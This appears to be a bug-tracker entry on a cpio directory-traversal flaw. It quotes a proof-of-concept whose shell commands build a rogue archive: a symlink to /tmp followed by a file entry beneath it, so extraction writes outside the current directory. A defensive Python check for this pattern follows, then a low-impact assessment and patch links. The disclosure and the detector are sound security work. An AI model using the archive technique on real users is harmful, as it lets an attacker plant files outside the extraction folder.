It was reported [1] that cpio is susceptible to a directory traversal vulnerability. Original report follows:

...
While extracting an archive, it will extract symlinks and then follow them if they are referenced in further entries. This can be exploited by a rogue archive to write files outside the current directory.

Example:

1) create a sample archive:

    ln -s /tmp dir
    echo dir | cpio -oF test.cpio
    rm dir
    mkdir dir
    echo hello > dir/file
    echo dir/file | cpio -oAF test.cpio
    rm -r dir

2) test it:

    cpio --no-absolute-filenames -ivF test.cpio

This will create a symlink "dir" in the current directory and a file "/tmp/file".
...

No patches are available at this time.

[1]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=774669
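A pre-extraction check for the pattern in the report above, as an added example that is not part of the original report or of cpio: it walks an archive's members and flags any whose path passes through a symlink defined earlier in the same archive. It assumes the archive is in the newc format (`cpio -H newc`); the function names and the in-memory sample are constructed for illustration, and the check is conservative in that it flags every such path regardless of where the symlink points.

```python
import stat
# Added example: helper names are illustrative, not taken from cpio.
def _pad4(n):
    return (4 - n % 4) % 4

def build_newc(entries):
    """Build a minimal newc archive from (name, mode, data) tuples (sample helper)."""
    out = b""
    for name, mode, data in list(entries) + [("TRAILER!!!", 0, b"")]:
        nm = name.encode() + b"\0"
        fields = [0, mode, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(nm), 0]
        hdr = b"070701" + b"".join(b"%08X" % f for f in fields)
        out += hdr + nm + b"\0" * _pad4(len(hdr) + len(nm))
        out += data + b"\0" * _pad4(len(data))
    return out

def parse_newc(buf):
    """Yield (name, mode, data) for each member of a newc archive."""
    pos = 0
    while pos + 110 <= len(buf):
        if buf[pos:pos + 6] not in (b"070701", b"070702"):
            raise ValueError("not a newc header at offset %d" % pos)
        f = [int(buf[pos + 6 + 8 * i:pos + 14 + 8 * i], 16) for i in range(13)]
        mode, size, namesize = f[1], f[6], f[11]
        name_end = pos + 110 + namesize
        name = buf[pos + 110:name_end - 1].decode(errors="replace")
        data_start = name_end + _pad4(110 + namesize)
        if name == "TRAILER!!!":
            return
        yield name, mode, buf[data_start:data_start + size]
        pos = data_start + size + _pad4(size)

def find_symlink_traversal(buf):
    """Return (member, symlink, target) for paths that pass through an archived symlink."""
    links, hits = {}, []
    for name, mode, data in parse_newc(buf):
        parts = [p for p in name.split("/") if p not in ("", ".")]
        for i in range(1, len(parts)):
            prefix = "/".join(parts[:i])
            if prefix in links:
                hits.append((name, prefix, links[prefix]))
                break
        if stat.S_ISLNK(mode):  # symlink target is stored as the member data
            links["/".join(parts)] = data.decode(errors="replace")
    return hits

# Constructed sample mirroring the report: symlink "dir" -> /tmp, then "dir/file".
SAMPLE = build_newc([("dir", stat.S_IFLNK | 0o777, b"/tmp"),
                     ("dir/file", stat.S_IFREG | 0o644, b"hello\n")])
```

Run `find_symlink_traversal()` on the archive bytes before extracting and refuse archives for which it returns any hits.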
Analysis
========

This attack requires social engineering the user into opening the cpio archive; the impact of this is low.
SUSE created a patch for this, attached at: https://bugzilla.suse.com/show_bug.cgi?id=658010
Created cpio tracking bugs for this issue: Affects: fedora-all [bug 1188590]
*** Bug 1539685 has been marked as a duplicate of this bug. ***